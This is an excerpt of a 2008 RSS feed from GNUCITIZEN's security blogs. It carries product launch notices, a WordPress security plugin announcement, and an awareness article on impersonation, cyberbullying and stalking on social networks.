         <description>&lt;p&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973268871/"&gt;&lt;img src="http://farm4.static.flickr.com/3277/2973268871_2dabec7f26_s.jpg" alt="Netsecurify Demo 01"/&gt;&lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973268953/"&gt;&lt;img src="http://farm4.static.flickr.com/3282/2973268953_414ae74eb1_s.jpg" alt="Netsecurify Demo 02"/&gt;  &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973269047/"&gt;&lt;img src="http://farm4.static.flickr.com/3022/2973269047_4cecb4f389_s.jpg" alt="Netsecurify Demo 03"/&gt; &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2974121322/"&gt;&lt;img src="http://farm4.static.flickr.com/3028/2974121322_3620a60988_s.jpg" alt="Netsecurify Demo 04"/&gt; &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973269265/"&gt;&lt;img src="http://farm4.static.flickr.com/3202/2973269265_c772ab099c_s.jpg" alt="Netsecurify Demo 05"/&gt; &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973269367/"&gt;&lt;img src="http://farm4.static.flickr.com/3050/2973269367_228292baa8_s.jpg" alt="Netsecurify Demo 06"/&gt; &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973269501/"&gt;&lt;img src="http://farm4.static.flickr.com/3205/2973269501_7a56264d68_s.jpg" alt="Netsecurify Demo 07"/&gt;&lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973269655/"&gt;&lt;img src="http://farm4.static.flickr.com/3196/2973269655_bc458c10a4_s.jpg" alt="Netsecurify Demo 08"/&gt; &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2974121782/"&gt;&lt;img src="http://farm4.static.flickr.com/3185/2974121782_ea4641480f_s.jpg" alt="Netsecurify Demo 09"/&gt; &lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6611345454199592701-533674730817576075?l=blog.netsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-6611345454199592701.post-533674730817576075</guid>
         <pubDate>Sun, 26 Oct 2008 02:10:00 -0700</pubDate>
      </item>
      <item>
         <title>Try Netsecurify</title>
         <link>http://blog.netsecurify.com/2008/10/try-netsecurify.html</link>
         <description>The Netsecurify service is still in private-beta which means that we are only offering it for free to our friends, our clients and selected members of the public. We are also willing to open it for prime time use to organizations with low security budget, charity organizations and others who might be in need. Please, &lt;a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/contact"&gt;get in touch&lt;/a&gt; with us if you want to try it out.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6611345454199592701-620036889456929733?l=blog.netsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-6611345454199592701.post-620036889456929733</guid>
         <pubDate>Mon, 20 Oct 2008 06:11:00 -0700</pubDate>
      </item>
      <item>
         <title>WP Blogsecurify Wordpress Security Plugin</title>
         <link>http://blog.blogsecurify.com/2008/10/wp-blogsecurify-wordpress-security.html</link>
         <description>It is finally out! Now you can download WP Blogsecurify Wordpress Security Plugin. Check out the &lt;a rel="nofollow" target="_blank" href="http://lab.gnucitizen.org/projects/wp-blogsecurify"&gt;GNUCITIZEN Laboratory&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;WP Blogsecurify is a security plugin for Wordpress designed to integrate several simple but important security patches for the popular blogging platform. This plugin was developed by the Blogsecurify team - a special division of GNUCITIZEN Information Security Think Tank.&lt;br /&gt;&lt;br /&gt;WP Blogsecurify protects your blog by:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;forcing users to login over a secure communication channel.&lt;/li&gt;&lt;li&gt;protecting session identifiers from incidental session leaks.&lt;/li&gt;&lt;li&gt;hiding database errors which could be caused by malfunctioning plugins.&lt;/li&gt;&lt;li&gt;protecting the entire user session from session-hijacking attacks.&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-style:italic;"&gt;This plugin is designed to be simple and effective. Future versions will protect against SQLI and XSS attacks. We are also planning to integrate WP Blogsecurify with our free social media security testing engine.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-1261227230671258410?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-1261227230671258410</guid>
         <pubDate>Mon, 20 Oct 2008 05:27:00 -0700</pubDate>
      </item>
      <item>
         <title>Exploiting trust in social networks</title>
         <link>http://blog.blogsecurify.com/2008/10/exploiting-trust-in-social-networks.html</link>
         <description>&lt;a rel="nofollow" target="_blank" href="http://3.bp.blogspot.com/_TkVLLciT0WE/SOeVsb3gjtI/AAAAAAAAAAo/jD9keaBHHXI/s1600-h/people_sm.jpg"&gt;&lt;img style="cursor:pointer;" src="http://3.bp.blogspot.com/_TkVLLciT0WE/SOeVsb3gjtI/AAAAAAAAAAo/jD9keaBHHXI/s400/people_sm.jpg" alt="" id="BLOGGER_PHOTO_ID_5253332080978333394" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="text-decoration:underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align:justify;"&gt;This is the first in a series of articles on Blogsecurify regarding the security of social networks and social media. In this article I will specifically talk about exploiting trust in social networks. My interest in social network/media security started several months ago when I put together a presentation on what many believe in the security community as the "top 5" threats to social networks. You can read more about the presentation on my blog, &lt;a rel="nofollow" target="_blank" href="http://spylogic.net/item/288"&gt;spylogic.net&lt;/a&gt;.&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align:justify;"&gt;&lt;br /&gt;The threats we will discuss in this article are "evil twin" attacks, &lt;a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Cyber-bullying"&gt;cyberbullying&lt;/a&gt; and &lt;a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Cyberstalking"&gt;cyberstalking&lt;/a&gt; as they relate to the trust model of social networks. Lets be honest, it's trivial to exploit trust in social networks. Why? There is no form of real authentication on any social network such as Facebook, MySpace, LinkedIn and Twitter (to name just a few). You can impersonate anyone, become someone new or hijack the profile of another existing user with very little skill. Create a profile, make up an identity to include birth date, relationship status, goals and dreams. Guess what? You are welcomed into the community with a complete profile that was never authenticated or verified as real. This can lead to leveraging and exploiting multiple levels of trust for malicious purposes.&lt;br /&gt;&lt;br /&gt;Interestingly enough the only thing to deter you from creating a fake profile or assuming the identity of someone else are the "terms of use" of the various social media companies. Most state that you must be a real person and you can't impersonate someone else. Take the &lt;a rel="nofollow" target="_blank" href="http://www.facebook.com/terms.php"&gt;Facebook terms of use&lt;/a&gt; for example:&lt;br /&gt;&lt;/div&gt;&lt;blockquote&gt;"You agree not to use the Service or the Site to...impersonate any person or entity, or falsely state or otherwise misrepresent yourself, your age or your affiliation with any person or entity..."&lt;/blockquote&gt;&lt;div style="text-align:justify;"&gt;Problem is...since when do attackers follow policies and terms of use?&lt;br /&gt;&lt;br /&gt;The "evil twin" attack is where an attacker takes on the persona or identity of a real person. This real person could be a celebrity or someone like a CEO or CFO of a major corporation. Becoming the identity of the victim gives you access to friends and associates that now trust &lt;span style="font-style:italic;"&gt;you&lt;/span&gt; since they think you are that person. Once you have access to a high value target profile you can potentially have access to lots of personal information...information that in some cases could allow you to conduct a password reset attack with the victims web mail account (like what happened to &lt;a rel="nofollow" target="_blank" href="http://blogs.artvoice.com/techvoice/2008/09/17/hackers-break-into-sarah-palins-inbox/"&gt;Sarah Palin&lt;/a&gt;) as one example. It would be even more advantageous using this profile to target the victims friends as well. Why not...they trust you right?&lt;br /&gt;&lt;br /&gt;Further manipulation of trust relationships leads to a whole slew of social engineering scenarios with various goals that an attacker could accomplish. The list may possibly be endless as the only limit to these types of attacks is the creativity of the attacker. Keep in mind that social engineering used as a way to attack people on social networks is not new by any means. Take for example the recent highly publicized &lt;a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Megan_Meier"&gt;Megan Meier&lt;/a&gt; "cyberbullying" case where an adult female posed as a teenage boy to literally destroy the life of another teenager. Megan committed suicide because of an attack that took very little skill to complete, yet had a life ending impact to the victim. We also see many different stories of cyberbullying/stalking in the mainstream media.&lt;span style="text-decoration:underline;"&gt; &lt;/span&gt;&lt;a rel="nofollow" target="_blank" href="http://www.phillyburbs.com/pb-dyn/news/111-09232008-1595106.html"&gt;Teens picking on teens&lt;/a&gt;, harassment of teachers, sexual predators, as well as &lt;a rel="nofollow" target="_blank" href="http://www.projo.com/news/content/NO_PAWTUCKET_CYBERSTALK12_09-12-08_RMBIC7S_v18.16e4a48.html"&gt;manipulating relationships&lt;/a&gt; to damage the reputation of others are popular trends. The list goes on and these problems are only getting worse.&lt;br /&gt;&lt;br /&gt;If you are reading this you are most likely in the security community and you "get it". You know not to trust anything or anybody on the Internet let alone social networks with your personal information. If you do allow access to your personal information then you probably know the risks and accept them. However, the people not reading this article are the ones that "don't get it", and we are talking about the majority social network users. This includes your non-security friends, family and the general public.&lt;br /&gt;&lt;br /&gt;So why don't the various social networks do something about this and educate their user base? The social networks will &lt;span style="font-style:italic;"&gt;never&lt;/span&gt; promote using social networks safely. Why? Because the more information you share with them, the more valuable you are! It was estimated a few years ago when News Corp purchased MySpace the average user of MySpace at that time was &lt;a rel="nofollow" target="_blank" href="http://gigaom.com/2008/03/13/lets-justify-facebooks-300-per-user-valuation/"&gt;worth approximately $27 each&lt;/a&gt;! Could you imagine the financial impact to the social network companies if every user started to lock down or not give away private information contained in these networks?&lt;br /&gt;&lt;br /&gt;I'm not suggesting to not use social networks but the key here is for us to educate the users of social networks that "don't get it". They should know that any information posted should always be considered public and if you do need to share personal information be very cautious about posting it. Trust in social media? There is no trust, this trust is implied and given.&lt;br /&gt;&lt;br /&gt;At the end of this month (ironically October is security awareness month) I will be releasing a Facebook Privacy &amp;amp; Security Guide which documents the recommended privacy and security settings you should use while still being able to use the "social" aspects of Facebook. I also include tips that can be used with any social media application to enhance your security and privacy. The guide is short and easy to distribute. I encourage it to be shared with those that "don't get it". :-)&lt;br /&gt;&lt;br /&gt;The next article in this series will talk about the security (or lack of security) of applications, widgets and anything else that can be added by a third-party to social network profiles.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-7894142370425781425?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (Tom)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-7894142370425781425</guid>
         <pubDate>Fri, 03 Oct 2008 18:05:00 -0700</pubDate>
         <media:thumbnail width="72" url="http://3.bp.blogspot.com/_TkVLLciT0WE/SOeVsb3gjtI/AAAAAAAAAAo/jD9keaBHHXI/s72-c/people_sm.jpg" height="72" />
      </item>
      <item>
         <title>Recruiting</title>
         <link>http://blog.blogsecurify.com/2008/09/recruiting.html</link>
         <description>We have started the recruiting process at &lt;a rel="nofollow" target="_blank" href="http://www.gnucitizen.org"&gt;GNUCITIZEN&lt;/a&gt;. Follow the blog for more updates.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-2066376015558925713?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-2066376015558925713</guid>
         <pubDate>Thu, 25 Sep 2008 02:12:00 -0700</pubDate>
      </item>
      <item>
         <title>Beginning</title>
         <link>http://blog.netsecurify.com/2008/09/beginning.html</link>
         <description>Today is the day. Netsecurify officially launches today.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6611345454199592701-6667434982835171778?l=blog.netsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-6611345454199592701.post-6667434982835171778</guid>
         <pubDate>Thu, 11 Sep 2008 05:49:00 -0700</pubDate>
      </item>
      <item>
         <title>The Framework is There</title>
         <link>http://blog.websecurify.com/2008/07/framework-is-there.html</link>
         <description>The framework is there. It is live. Now we are using a powerful scaffolding logic which will enable us to expand without much overhead. The testing API is coming soon.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2382932154546319997-728725100114601868?l=blog.websecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-2382932154546319997.post-728725100114601868</guid>
         <pubDate>Thu, 31 Jul 2008 04:18:00 -0700</pubDate>
      </item>
      <item>
         <title>Starting Websecurify</title>
         <link>http://blog.websecurify.com/2008/06/starting-websecurify.html</link>
         <description>Starting work on Websecurify.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2382932154546319997-3609731593647444456?l=blog.websecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-2382932154546319997.post-3609731593647444456</guid>
         <pubDate>Thu, 26 Jun 2008 03:29:00 -0700</pubDate>
      </item>
      <item>
         <title>Official Launch</title>
         <link>http://blog.blogsecurify.com/2008/06/official-launch.html</link>
         <description>The official launch of Blogsecurify will take place on Monday 23th of June.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-747215489355315227?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-747215489355315227</guid>
         <pubDate>Sun, 22 Jun 2008 10:48:00 -0700</pubDate>
      </item>
      <item>
         <title>Soon to Expect</title>
         <link>http://blog.blogsecurify.com/2008/06/soon-to-expect.html</link>
         <description>Soon to expect Websecurify...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-1136720549717667327?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-1136720549717667327</guid>
         <pubDate>Fri, 20 Jun 2008 03:38:00 -0700</pubDate>
      </item>
      <item>
         <title>Blogsecurify Promo Video</title>
         <link>http://blog.blogsecurify.com/2008/06/blogsecurify-promo-video.html</link>
         <description>Enjoy the promo video!&lt;br /&gt;&lt;br /&gt;&lt;iframe class="embeddedvideo" src="http://www.youtube.com/v/1uyx1We5ckU&amp;amp;hl=en" type="application/x-shockwave-flash" width="425" height="344"&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-8974049461127124793?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-8974049461127124793</guid>
         <pubDate>Thu, 19 Jun 2008 08:06:00 -0700</pubDate>
      </item>
      <item>
         <title>Looking for Bloggers</title>
         <link>http://blog.blogsecurify.com/2008/06/looking-for-bloggers.html</link>
         <description>Although, this project is primary oriented towards the online security testing tool, I am welcoming anyone who is willing to become an Blogsecurify active blogger to get in touch with us. It could turn to be an excellent opportunity to start your online career. And it is fun!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-7293677220942579707?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-7293677220942579707</guid>
         <pubDate>Thu, 19 Jun 2008 07:31:00 -0700</pubDate>
      </item>
      <item>
         <title>Welcome</title>
         <link>http://blog.blogsecurify.com/2008/06/welcome.html</link>
         <description>This is the official blog of &lt;a rel="nofollow" target="_blank" href="http://www.blogsecurify.com/"&gt;Blogsecurify&lt;/a&gt;. Here we will post further updates regarding our online tool. Stay tuned.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-3591500561419967267?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-3591500561419967267</guid>
         <pubDate>Thu, 19 Jun 2008 07:05:00 -0700</pubDate>
      </item>
   </channel>
</rss><!-- fe3.pipes.re3.yahoo.com uncompressed Fri Jul 10 02:12:54 PDT 2009 -->
